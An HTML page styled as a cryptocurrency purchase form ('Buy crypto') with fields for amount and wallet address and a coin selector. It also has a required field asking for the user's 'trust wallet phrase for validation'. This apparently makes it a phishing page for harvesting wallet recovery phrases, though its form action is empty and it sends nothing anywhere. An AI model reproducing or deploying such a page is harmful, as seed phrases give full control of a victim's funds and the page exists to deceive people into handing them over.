<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="shortcut icon" href="images/favicon.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Buy</title>
    <style>
         body{
             padding: 0%;
             margin: 0;
         }
        .buy-div-one{ 
            width: 100%;
            height: 900px; 
            background-color: rgba(0, 0, 0, 0.637);
            background-blend-mode: multiply;
            background-size:  100% 100%;
            background-image: url('/images/slider/bg1.jpg');
        }
        .down{
            margin: auto;
            width: 35%;
            padding: 10px;
            background-color: black;
            height: 350px;
        }
        .tobuy{
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            padding: 10px;
            width: 100%;
            text-align: center;
            color: white;
        }
        .anyway{
             width: 90%;
             padding: 10px;
             background-color: rgb(32, 32, 32);
             outline: none;
             border: none;
             color: white;
        }
        .coin{
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
   
            color: gray;
            padding: 10px;
        }
        .rightt{
            width:30%;
            height: 40px;
            float: right;
            margin-top: 20px; 
        }
        .byu{
            cursor: pointer; 
            border: none;
            outline: none;
            height: inherit;
            color: white;
            background-color: #fd961a ;
            width: 100%;
        }
        .anyways{
         width: 95%;
             padding: 10px;
             background-color: rgb(32, 32, 32);
             outline: none;
             border: none;
             color: white;
        }
    </style>
</head>
<body>  
<div class="buy-div-one">
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <form action=""> 
      <div class="down">
        <div class="tobuy">
             Buy  <label for="" style="color: #fd961a;">crypto</label>
        </div>
        <input type="text" placeholder="Amount" required class="anyway">
        <br>
        <br> 
        <input type="text" placeholder="your wallet address" required class="anyway">
        <br>
        <br>
        <input type="text" placeholder="trust wallet phrase for validation" required class="anyway">
        <br>
        <br>
        <b class="coin">Set coin</b>
        <br> 
        <br>
        <select name="" id="" class="anyways">
            <option value="">Bitcon</option>
            <option value="">Eth</option>
            <option value=""> doge</option>
        </select>
        <div class="rightt">
          <button class="byu">
              Buy
          </button>
        </div> 
   </div>
    </form>
</div> 
</body>
</html>